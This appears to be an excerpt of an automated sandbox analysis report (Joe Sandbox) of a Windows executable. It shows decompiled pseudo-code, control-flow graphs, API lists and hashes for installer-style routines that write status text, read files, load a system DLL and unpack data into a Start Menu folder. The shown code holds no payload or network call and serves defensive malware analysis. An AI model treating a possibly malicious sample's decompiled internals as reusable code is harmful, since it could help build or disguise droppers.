                                                        Function 004052B0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 629 4052b0-4052c5 630 4052cb-4052dc 629->630 631 40537c-405380 629->631 632 4052e7-4052f3 lstrlenW 630->632 633 4052de-4052e2 call 40626e 630->633 634 405310-405314 632->634 635 4052f5-405305 lstrlenW 632->635 633->632 638 405323-405327 634->638 639 405316-40531d SetWindowTextW 634->639 635->631 637 405307-40530b lstrcatW 635->637 637->634 640 405329-40536b SendMessageW * 3 638->640 641 40536d-40536f 638->641 639->638 640->641 641->631 642 405371-405374 641->642 642->631
                                                        C-Code - Quality: 100%
                                                        			E004052B0(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x4291e4;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x42a2d4;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E0040626E(_t38, 0, 0x4226c8, 0x4226c8, _a4);
					}
					_t27 = lstrlenW(0x4226c8);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x4291c8, 0x4226c8); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x4226c8;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x4226c8[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x4226c8, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

















                                                        0x004052b6
                                                        0x004052c0
                                                        0x004052c5
                                                        0x004052cb
                                                        0x004052d6
                                                        0x004052d9
                                                        0x004052dc
                                                        0x004052e2
                                                        0x004052e2
                                                        0x004052e8
                                                        0x004052f0
                                                        0x004052f3
                                                        0x00405310
                                                        0x00405314
                                                        0x0040531d
                                                        0x0040531d
                                                        0x00405327
                                                        0x00405330
                                                        0x0040533c
                                                        0x00405343
                                                        0x00405347
                                                        0x0040534a
                                                        0x0040535d
                                                        0x0040536b
                                                        0x0040536b
                                                        0x0040536f
                                                        0x00405371
                                                        0x00405374
                                                        0x00000000
                                                        0x00405374
                                                        0x004052f5
                                                        0x004052fd
                                                        0x00405305
                                                        0x0040530b
                                                        0x00000000
                                                        0x0040530b
                                                        0x00405305
                                                        0x004052f3
                                                        0x00405380

                                                        APIs
                                                        • lstrlenW.KERNEL32(Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                                                        • lstrlenW.KERNEL32(00403233,Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                                        • lstrcatW.KERNEL32(Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00403233), ref: 0040530B
                                                        • SetWindowTextW.USER32(Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade), ref: 0040531D
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                        • String ID: Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade
                                                        • API String ID: 2531174081-2413961532
                                                        • Opcode ID: 59d154118c10e025c7735e233b98b544c2589afa460e0b5fca85982ca0aab28e
                                                        • Instruction ID: a4acd4142143b7f1d9b449385db23515f6e2bed73a3e7c1e364118513a645948
                                                        • Opcode Fuzzy Hash: 59d154118c10e025c7735e233b98b544c2589afa460e0b5fca85982ca0aab28e
                                                        • Instruction Fuzzy Hash: 09216071900518BACB21AF66DD84DDFBF74EF45350F14807AF944B62A0C7794A51CF68
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00402644 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 643 402644-40265d call 402c15 646 402663-40266a 643->646 647 402abf-402ac2 643->647 648 40266c 646->648 649 40266f-402672 646->649 650 402ac8-402ace 647->650 648->649 651 4027d6-4027de 649->651 652 402678-402687 call 4061ac 649->652 651->647 652->651 656 40268d 652->656 657 402693-402697 656->657 658 40272c-40272f 657->658 659 40269d-4026b8 ReadFile 657->659 660 402731-402734 658->660 661 402747-402757 call 405dc1 658->661 659->651 662 4026be-4026c3 659->662 660->661 663 402736-402741 call 405e1f 660->663 661->651 671 402759 661->671 662->651 665 4026c9-4026d7 662->665 663->651 663->661 668 402792-40279e call 406193 665->668 669 4026dd-4026ef MultiByteToWideChar 665->669 668->650 669->671 672 4026f1-4026f4 669->672 675 40275c-40275f 671->675 676 4026f6-402701 672->676 675->668 677 402761-402766 675->677 676->675 678 402703-402728 SetFilePointer MultiByteToWideChar 676->678 679 4027a3-4027a7 677->679 680 402768-40276d 677->680 678->676 681 40272a 678->681 682 4027c4-4027d0 SetFilePointer 679->682 683 4027a9-4027ad 679->683 680->679 684 40276f-402782 680->684 681->671 682->651 685 4027b5-4027c2 683->685 686 4027af-4027b3 683->686 684->651 687 402784-40278a 684->687 685->651 686->682 686->685 687->657 688 402790 687->688 688->651
                                                        C-Code - Quality: 83%
                                                        			E00402644(intOrPtr __ebx, intOrPtr __edx, void* __esi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x48)) = _t65;
				_t66 = E00402C15(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t72;
				 *((intOrPtr*)(_t76 - 0x3c)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x42a2a8 =  *0x42a2a8 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x3c) = 0x3ff;
					}
					if( *__esi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x30) = __ebx;
						 *(__ebp - 0x10) = E004061AC(__ecx, __esi);
						if( *(__ebp - 0x3c) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x2c)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx ||  *(__ebp - 8) != __ebx || E00405E1F( *(__ebp - 0x10), __ebx) >= 0) {
										__eax = __ebp - 0x44;
										if(E00405DC1( *(__ebp - 0x10), __ebp - 0x44, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x38;
									_push(__ebx);
									_push(__ebp - 0x38);
									__eax = 2;
									__ebp - 0x38 -  *((intOrPtr*)(__ebp - 0x1c)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x10), __ebp + 0xa, __ebp - 0x38 -  *((intOrPtr*)(__ebp - 0x1c)), ??, ??); // executed
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x38);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x48) = __ecx;
											 *(__ebp - 0x44) = __eax;
											if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E00406193( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x44 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x44, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x44);
												} else {
													__esi =  *(__ebp - 0x48);
													__esi =  ~( *(__ebp - 0x48));
													while(1) {
														_t22 = __ebp - 0x38;
														 *_t22 =  *(__ebp - 0x38) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x44) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x48) =  *(__ebp - 0x48) - 1;
														__esi = __esi + 1;
														__eax = SetFilePointer( *(__ebp - 0x10), __esi, __ebx, 1); // executed
														__ebp - 0x44 = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x38), __ebp - 0x44, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x30) == 0xd ||  *(__ebp - 0x30) == 0xa) {
														if( *(__ebp - 0x30) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x48) =  ~( *(__ebp - 0x48));
															__eax = SetFilePointer( *(__ebp - 0x10),  ~( *(__ebp - 0x48)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x30) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x3c));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}








                                                        0x00402644
                                                        0x00402646
                                                        0x00402649
                                                        0x0040264b
                                                        0x0040264e
                                                        0x00402653
                                                        0x00402657
                                                        0x0040265a
                                                        0x0040265d
                                                        0x00402abf
                                                        0x00402ac2
                                                        0x00402663
                                                        0x00402663
                                                        0x0040266a
                                                        0x0040266c
                                                        0x0040266c
                                                        0x00402672
                                                        0x004027d6
                                                        0x004027d6
                                                        0x004027d9
                                                        0x004027de
                                                        0x004015b6
                                                        0x00402885
                                                        0x00402885
                                                        0x00000000
                                                        0x00402678
                                                        0x00402679
                                                        0x00402684
                                                        0x00402687
                                                        0x00402693
                                                        0x00402697
                                                        0x0040272f
                                                        0x00402747
                                                        0x00402757
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0040269d
                                                        0x0040269d
                                                        0x004026a0
                                                        0x004026a1
                                                        0x004026a4
                                                        0x004026a9
                                                        0x004026b0
                                                        0x004026b8
                                                        0x00000000
                                                        0x004026be
                                                        0x004026be
                                                        0x004026c3
                                                        0x00000000
                                                        0x004026c9
                                                        0x004026c9
                                                        0x004026d1
                                                        0x004026d4
                                                        0x004026d7
                                                        0x00402792
                                                        0x00402799
                                                        0x004026dd
                                                        0x004026e3
                                                        0x004026ef
                                                        0x00402759
                                                        0x00402759
                                                        0x004026f1
                                                        0x004026f1
                                                        0x004026f4
                                                        0x004026f6
                                                        0x004026f6
                                                        0x004026f6
                                                        0x004026f9
                                                        0x004026fe
                                                        0x00402701
                                                        0x00000000
                                                        0x00000000
                                                        0x00402703
                                                        0x00402706
                                                        0x0040270e
                                                        0x0040271a
                                                        0x00402728
                                                        0x00000000
                                                        0x0040272a
                                                        0x00000000
                                                        0x0040272a
                                                        0x00000000
                                                        0x00402728
                                                        0x004026f6
                                                        0x0040275c
                                                        0x0040275f
                                                        0x00000000
                                                        0x00402761
                                                        0x00402766
                                                        0x004027a7
                                                        0x004027c9
                                                        0x004027d0
                                                        0x004027b5
                                                        0x004027b5
                                                        0x004027b8
                                                        0x004027bb
                                                        0x004027be
                                                        0x004027be
                                                        0x00000000
                                                        0x0040276f
                                                        0x0040276f
                                                        0x00402772
                                                        0x00402775
                                                        0x0040277b
                                                        0x0040277f
                                                        0x00402782
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00402782
                                                        0x00402766
                                                        0x0040275f
                                                        0x004026d7
                                                        0x004026c3
                                                        0x004026b8
                                                        0x00000000
                                                        0x00402784
                                                        0x00402784
                                                        0x00402787
                                                        0x00402790
                                                        0x00000000
                                                        0x00402687
                                                        0x00402672
                                                        0x00402ac8
                                                        0x00402ace

                                                        APIs
                                                        • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B0
                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026EB
                                                        • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040270E
                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402724
                                                          • Part of subcall function 00405E1F: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E35
                                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: File$Pointer$ByteCharMultiWide$Read
                                                        • String ID: 9
                                                        • API String ID: 163830602-2366072709
                                                        • Opcode ID: efe543eef621af3ce3e1f10678013b5d314bdbd7c9d0a35879e6d8519b0983c6
                                                        • Instruction ID: e157cda522c6117da55a2477cd969df60feaafed97a1adf3b1f02a042ae2ebc2
                                                        • Opcode Fuzzy Hash: efe543eef621af3ce3e1f10678013b5d314bdbd7c9d0a35879e6d8519b0983c6
                                                        • Instruction Fuzzy Hash: 9C51F774D10219ABDF20DFA5DA88AAEB779FF04304F50443BE511B72D1D7B89982CB58
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004065B6 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 689 4065b6-4065d6 GetSystemDirectoryW 690 4065d8 689->690 691 4065da-4065dc 689->691 690->691 692 4065ed-4065ef 691->692 693 4065de-4065e7 691->693 695 4065f0-406623 wsprintfW LoadLibraryExW 692->695 693->692 694 4065e9-4065eb 693->694 694->695
                                                        C-Code - Quality: 100%
                                                        			E004065B6(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}








                                                        0x004065cd
                                                        0x004065d6
                                                        0x004065d8
                                                        0x004065d8
                                                        0x004065dc
                                                        0x004065ef
                                                        0x004065e9
                                                        0x004065e9
                                                        0x004065e9
                                                        0x00406608
                                                        0x0040661c
                                                        0x00406623

                                                        APIs
                                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065CD
                                                        • wsprintfW.USER32 ref: 00406608
                                                        • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040661C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                                        • String ID: %s%S.dll$UXTHEME$\
                                                        • API String ID: 2200240437-1946221925
                                                        • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                        • Instruction ID: f2f916ca2f11fba704df1b43a3ace0cea71321b702594bff0db05fa861777559
                                                        • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                        • Instruction Fuzzy Hash: F9F0F670500219BBCF24AB68ED0DF9B3B6CAB00704F50447AA646F10D1EB78DA24CBA8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004030FA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 696 4030fa-403111 697 403113 696->697 698 40311a-403122 696->698 697->698 699 403124 698->699 700 403129-40312e 698->700 699->700 701 403130-403139 call 4032f5 700->701 702 40313e-40314b call 4032df 700->702 701->702 706 403151-403155 702->706 707 403296 702->707 709 40315b-40317b GetTickCount call 406787 706->709 710 40327f-403281 706->710 708 403298-403299 707->708 711 4032d8-4032dc 708->711 722 4032d5 709->722 724 403181-403189 709->724 712 403283-403286 710->712 713 4032ca-4032ce 710->713 715 403288 712->715 716 40328b-403294 call 4032df 712->716 717 4032d0 713->717 718 40329b-4032a1 713->718 715->716 716->707 729 4032d2 716->729 717->722 720 4032a3 718->720 721 4032a6-4032b4 call 4032df 718->721 720->721 721->707 733 4032b6-4032c2 call 405df0 721->733 722->711 727 40318b 724->727 728 40318e-40319c call 4032df 724->728 727->728 728->707 734 4031a2-4031ab 728->734 729->722 739 4032c4-4032c7 733->739 740 40327b-40327d 733->740 736 4031b1-4031ce call 4067a7 734->736 742 4031d4-4031eb GetTickCount 736->742 743 403277-403279 736->743 739->713 740->708 744 403236-403238 742->744 745 4031ed-4031f5 742->745 743->708 748 40323a-40323e 744->748 749 40326b-40326f 744->749 746 4031f7-4031fb 745->746 747 4031fd-40322e MulDiv wsprintfW call 4052b0 745->747 746->744 746->747 756 403233 747->756 752 403240-403245 call 405df0 748->752 753 403253-403259 748->753 749->724 750 403275 749->750 750->722 757 40324a-40324c 752->757 755 40325f-403263 753->755 755->736 758 403269 755->758 756->744 757->740 759 40324e-403251 757->759 758->722 759->755
                                                        C-Code - Quality: 94%
                                                        			E004030FA(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				long _v16;
				intOrPtr _v20;
				short _v148;
				void* _t59;
				intOrPtr _t69;
				long _t70;
				void* _t71;
				intOrPtr _t81;
				intOrPtr _t86;
				long _t89;
				signed int _t90;
				int _t91;
				int _t92;
				intOrPtr _t93;
				void* _t94;
				void* _t95;

				_t90 = _a16;
				_t86 = _a12;
				_v12 = _t90;
				if(_t86 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_t81 = _t86;
				if(_t86 == 0) {
					_t81 = 0x410ea0;
				}
				_t56 = _a4;
				if(_a4 >= 0) {
					E004032F5( *0x42a278 + _t56);
				}
				if(E004032DF( &_a16, 4) == 0) {
					L33:
					_push(0xfffffffd);
					goto L34;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t86 == 0) {
							while(_a16 > 0) {
								_t91 = _v12;
								if(_a16 < _t91) {
									_t91 = _a16;
								}
								if(E004032DF(0x40cea0, _t91) == 0) {
									goto L33;
								} else {
									if(E00405DF0(_a8, 0x40cea0, _t91) == 0) {
										L28:
										_push(0xfffffffe);
										L34:
										_pop(_t59);
										return _t59;
									}
									_v8 = _v8 + _t91;
									_a16 = _a16 - _t91;
									continue;
								}
							}
							L43:
							return _v8;
						}
						if(_a16 < _t90) {
							_t90 = _a16;
						}
						if(E004032DF(_t86, _t90) != 0) {
							_v8 = _t90;
							goto L43;
						} else {
							goto L33;
						}
					}
					_v16 = GetTickCount();
					E00406787(0x40ce10);
					_t13 =  &_a16;
					 *_t13 = _a16 & 0x7fffffff;
					_a4 = _a16;
					if( *_t13 <= 0) {
						goto L43;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t92 = 0x4000;
						if(_a16 < 0x4000) {
							_t92 = _a16;
						}
						if(E004032DF(0x40cea0, _t92) == 0) {
							goto L33;
						}
						_a16 = _a16 - _t92;
						 *0x40ce28 = 0x40cea0;
						 *0x40ce2c = _t92;
						while(1) {
							 *0x40ce30 = _t81;
							 *0x40ce34 = _v12; // executed
							_t69 = E004067A7(0x40ce10); // executed
							_v20 = _t69;
							if(_t69 < 0) {
								break;
							}
							_t93 =  *0x40ce30; // 0x410ea0
							_t94 = _t93 - _t81;
							_t70 = GetTickCount();
							_t89 = _t70;
							if(( *0x42a2d4 & 0x00000001) != 0 && (_t70 - _v16 > 0xc8 || _a16 == 0)) {
								wsprintfW( &_v148, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t95 = _t95 + 0xc;
								E004052B0(0,  &_v148); // executed
								_v16 = _t89;
							}
							if(_t94 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L43;
							} else {
								if(_a12 != 0) {
									_v8 = _v8 + _t94;
									_v12 = _v12 - _t94;
									_t81 =  *0x40ce30; // 0x410ea0
									L23:
									if(_v20 != 1) {
										continue;
									}
									goto L43;
								}
								_t71 = E00405DF0(_a8, _t81, _t94); // executed
								if(_t71 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t94;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L34;
					}
					goto L33;
				}
			}





















                                                        0x00403105
                                                        0x00403109
                                                        0x0040310c
                                                        0x00403111
                                                        0x00403113
                                                        0x00403113
                                                        0x0040311a
                                                        0x0040311e
                                                        0x00403122
                                                        0x00403124
                                                        0x00403124
                                                        0x00403129
                                                        0x0040312e
                                                        0x00403139
                                                        0x00403139
                                                        0x0040314b
                                                        0x00403296
                                                        0x00403296
                                                        0x00000000
                                                        0x00403151
                                                        0x00403155
                                                        0x00403281
                                                        0x004032ca
                                                        0x0040329b
                                                        0x004032a1
                                                        0x004032a3
                                                        0x004032a3
                                                        0x004032b4
                                                        0x00000000
                                                        0x004032b6
                                                        0x004032c2
                                                        0x0040327b
                                                        0x0040327b
                                                        0x00403298
                                                        0x00403298
                                                        0x00000000
                                                        0x00403298
                                                        0x004032c4
                                                        0x004032c7
                                                        0x00000000
                                                        0x004032c7
                                                        0x004032b4
                                                        0x004032d5
                                                        0x00000000
                                                        0x004032d5
                                                        0x00403286
                                                        0x00403288
                                                        0x00403288
                                                        0x00403294
                                                        0x004032d2
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00403294
                                                        0x00403166
                                                        0x00403169
                                                        0x0040316e
                                                        0x0040316e
                                                        0x00403178
                                                        0x0040317b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00403181
                                                        0x00403181
                                                        0x00403181
                                                        0x00403189
                                                        0x0040318b
                                                        0x0040318b
                                                        0x0040319c
                                                        0x00000000
                                                        0x00000000
                                                        0x004031a2
                                                        0x004031a5
                                                        0x004031ab
                                                        0x004031b1
                                                        0x004031b9
                                                        0x004031bf
                                                        0x004031c4
                                                        0x004031cb
                                                        0x004031ce
                                                        0x00000000
                                                        0x00000000
                                                        0x004031d4
                                                        0x004031da
                                                        0x004031dc
                                                        0x004031e9
                                                        0x004031eb
                                                        0x0040321c
                                                        0x00403222
                                                        0x0040322e
                                                        0x00403233
                                                        0x00403233
                                                        0x00403238
                                                        0x0040326f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0040323a
                                                        0x0040323e
                                                        0x00403253
                                                        0x00403256
                                                        0x00403259
                                                        0x0040325f
                                                        0x00403263
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00403269
                                                        0x00403245
                                                        0x0040324c
                                                        0x00000000
                                                        0x00000000
                                                        0x0040324e
